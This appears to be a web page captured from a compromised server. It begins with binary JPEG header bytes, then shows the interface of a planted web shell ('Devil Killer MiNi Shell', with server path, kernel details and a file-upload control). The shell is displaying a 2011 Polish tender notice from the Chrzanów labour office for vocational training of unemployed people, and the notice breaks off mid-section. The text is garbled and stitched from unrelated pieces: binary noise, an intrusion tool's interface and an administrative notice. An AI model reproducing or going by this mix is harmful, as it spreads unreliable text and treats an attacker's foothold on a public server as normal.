JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110525/147703-N-2011.html

<p class="kh_header"><b>Chrzanów: Przeprowadzenie szkoleń grupowych dla:osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie</b><br>
<b>Numer ogłoszenia: 147703 - 2011; data zamieszczenia: 25.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chrzanowie , ul. Słowackiego 8, 32-500 Chrzanów, woj. małopolskie, tel. 032 7533800, faks 032 7533899.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń grupowych dla:osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  przeprowadzenie szkoleń zawodowych dla:
osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie . 

Zamówienie składa się z  7  części: 

Część 1.  Operator sprzętu ciężkiego: koparko -ładowarki   - dla   10  osób,  planowany termin realizacji:  czerwiec - lipiec  2011. 

Część 2. Monter nawierzchni drogowych - Brukarz - dla 10 osób, planowany termin realizacji: czerwiec -  lipiec 2011r.

Część 3. Kasjer handlowy - dla 30 osób ( podzielonych na  dwie grupy 15 osobowe ); planowany termin realizacji: I grupa - czerwiec, II grupa - wrzesień). 

Część 4. Spawacz metodą Mag + Tig - dla 10 osób; planowany termin realizacji: czerwiec / lipiec 2011r. 

Część 5. Pomoc kucharza - dla 10 osób; planowany termin realizacji : czerwiec / lipiec 2011r.

Część 6. Specjalista finansowo - księgowy - dla 10 osób; planowany termin realizacji: lipiec / sierpień 2011r.

Część 7. ABC własnej firmy - dla 40 osób ( podzielonych na 3 grupy ); planowany termin realizacji: I grupa - lipiec;  II grupa - sierpień; III grupa - październik 2011r. )..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Aktualny wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365) - dotyczy wszystkich części zamówienia. 
b)Potwierdzenie spełniania wymagań określonych w § 25 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001r w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych ( Dz. U Nr 118 poz.1263), wystawione przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego - dotyczy części 1  zamówienia.
c)Atest Instytutu Spawalnictwa w Gliwicach uprawniający do szkolenia i egzaminowania spawaczy  - okres ważności atestu nie może być krótszy niż termin realizacji szkolenia  -  dotyczy części  4 zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się przeprowadzeniem z należytą starannością, co najmniej jednego szkolenia grupowego w  okresie ostatnich trzech lat ( dla min. 10 osób )  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia  dla poszczególnych części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował  urządzeniami  adekwatnymi do danej  części zamówienia umożliwiającymi realizację szkolenia.  Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe wyposażone w  niezbędne narzędzia
 i materiały . Każdy z uczestników szkolenia powinien  mieć indywidualny  dostęp do sprzętu  i materiałów wykorzystywanych przy realizacji szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował co  najmniej 2 osobami do każdej z części zamówienia, które posiadają adekwatne do zakresu szkolenia  kwalifikacje, wykształcenie,  doświadczenie zawodowe. 
Przynajmniej jeden z wykładowców musi posiadać wykształcenie wyższe kierunkowe oraz uprawnienia pedagogiczne i co najmniej roczne doświadczenie 
w prowadzeniu szkoleń o tematyce zgodnej z przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie spełnenia ww. warunku bęzie złożenie oświadczenia w trybie art.22 ust. 1 PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pisemne oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne.
2. Oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy PZP</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.70</li>
<li>2 - Doświadczenie wykonawcy - 0.20</li>
<li>3 - Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4 - Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>.Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza   możliwość  zmiany  postanowień  umowy. Zmiany mogą dotyczyć:
-  zakresu  usług objętych umową,  w przypadku  zmian przepisów prawa w tym zakresie,
- miejsca realizacji  świadczeń z  zastrzeżeniem lokalizacji na terenie powiatu chrzanowskiego,
-  kadry wykonującej przedmiot zamówienia z przyczyn losowych ( za zgodą Zamawiającego ),
-  terminu przeprowadzenia szkolenia  
  - zmiana ilości  osób  objętych  szkoleniem ( w sytuacji gdy szkolenie obejmuje kilka grup liczba osób w poszczególnych grupach może ulec  zmianie pod warunkiem, iż łączna liczba osób objętych szkoleniem ze wszystkich grup nie zmieni się i będzie zgodna
 z przedmiotem zamówienia). 
-  zmiana  kosztów szkolenia jeżeli te zmiany są korzystne dla  Zamawiającego,
-  zmiana kosztu osobogodziny jeżeli  ta  zmiana jest  korzystna dla  amawiającego
- zmiany w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Słowackiego 8, 32-500 Chrzanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2011 godzina 09:30, miejsce: ul. Słowackiego 8, 32-500 Chrzanów, Dziennik Podawczy, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nowe Perspektywy realizowanym w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VI Rynek pracy otwarty dla wszystkich DZIAŁANIE 6.1 Poprawa   dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie PODDZIAŁANIE 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Operator sprzętu ciężkiego: koparko-ładowarka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób w specjalności: Operator sprzętu ciężkiego: koparko-ładowarka

2.  Miejsce organizacji szkolenia:  preferowany powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3.Program szkolenia powinien obejmować min.  176  godzin dydaktycznych.  Szkolenie powinno być zorganizowane zgodnie z Rozporządzeniem  Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych ( Dz. U. Nr 118 poz. 1263), przeprowadzone w oparciu o program zatwierdzony przez Instytut Mechanizacji  Budownictwa  i Górnictwa Skalnego w Warszawie. 

4.Sposób organizacji zajęć praktycznych: 
- zajęcia praktyczne mają być przeprowadzone zgodnie z Rozporządzeniem  Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych ( Dz. U. Nr 118 poz. 1263) . 
- W  ramach zajęć praktycznych uczestnicy nabędą m.in. następujące umiejętności:
-Sporządzanie dokumentacji eksploatacyjnej 
-Jazda koparko-ładowarka
-Praca koparko-ładowarką
-Konserwacja koparko-ładowarki. 
- Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 

5.	Czas trwania:  nie dłużej niż 30 kolejnych dni roboczych. 

6. Termin realizacji szkolenia:  czerwiec  - lipiec 2011r. 

7.Inne postanowienia:
Zaświadczenie  musi być wydane zgodnie z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14.  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ). Ponadto każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
- Świadectwo Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego
- książkę operatora maszyn roboczych.

Ustala się, że kurs zakończy się egzaminem  przed komisją z Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfiaktów jakości usług - 0.05</li>
<li>4. Rodzaj Dokumentu potwierdzającego  ukończenie szkolenie i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Monter nawierzchni drogowych - Brukarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla 10  osób bezrobotnych w specjalności: Monter nawierzchni drogowych - Brukarz.  

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby. 

3. Program szkolenia powinien obejmować  180 godzin dydaktycznych i zawierać następujące moduły:
1.	Bezpieczeństwo i  higiena pracy przy wykonywaniu robót budowlanych ze szczególnym uwzględnieniem robót brukarskich i drogowych.  
2.	Materiałoznawstwo. 
3.	Technologia z elementami maszynoznawstwa. 
4.	Narzędzia przydatne w zawodzie brukarz
5.	Podstawy rysunku technicznego. 
6.	Zasady postępowania w razie wypadku w czasie pracy i w sytuacjach zagrożeń, w tym zasady udzielania pierwszej pomocy w razie wypadku
7.	Zajęcia praktyczne.  

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych do zawodu brukarz, dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia.

4.Sposób organizacji zajęć praktycznych: 

W ramach zajęć praktycznych uczestnicy szkolenia mają wykonać zakres prac związanych z wyłożeniem nawierzchni 
o powierzchni min. 200 m2  zgodnie z technologią prac brukarskich, która powinna obejmować :

-przygotowanie podłoża do korytowania 
-korytowanie podłoża
-wykonanie podbudowy wraz z zagęszczeniem
-ułożenie obrzeży
-ułożenie kostki brukowej
-spoinowanie powierzchni ułożonej
-wyłożenie kostki brukowej.

- Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 70%. 
- Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 

5. Czas trwania: nie dłużej niż 30 kolejnych dni roboczych.  

6. Termin realizacji szkolenia: czerwiec / lipiec  2011. 

7. Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) 
W/w dokumenty mają być wydane zgodnie   z  wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia 14.  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy  ( Dz. U. nr 177, poz. 1193 )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie Wykonawcy - 0.20</li>
<li>3. Posidanie certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kasjer handlowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla 30 osób bezrobotnych ( podzielonych na 2 grupy  15 osobowe)  w specjalności: Kasjer handlowy.

Liczba osób w poszczególnych grupach może ulec  zmianie pod warunkiem, iż  szkoleniem zostanie objętych łącznie 30 osób.  
O ewentualnej zmianie liczby osób w poszczególnych grupach Wykonawca zostanie poinformowany nie później niż na 7 dni przed rozpoczęciem szkolenia. 

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3.Program szkolenia powinien obejmować 30 godzin dydaktycznych i zawierać następujące moduły:
-	Podstawowe zagadnienia z zakresu podatku VAT
-	Kasa fiskalna jako element fiskalizacji w handlu i usługach, typy kas i ich działanie, materiały eksploatacyjne
-	Zajęcia praktyczne
-	Zasady bezpieczeństwa w obrocie produktami żywnościowymi  i przestrzegania zasad higieny  w procesie produkcji
-	Podstawowe zasady higieny ( HACCP )

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem  www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie  może przekroczyć 30. 

4. Sposób organizacji zajęć praktycznych:  
- zajęcia praktyczne powinny stanowić min. 50 % ogólnej liczby godzin objętych programem.  
- w ramach zajęć praktycznych uczestnik powinien nabyć umiejętność obsługi kasy fiskalnej oraz terminali płatniczych. 
- w ramach zajęć praktycznych wykonawca musi zapewnić liczbę kas fiskalnych co najmniej równą liczbie uczestników ( na jedną kasę może przypadać tylko jeden uczestnik). 
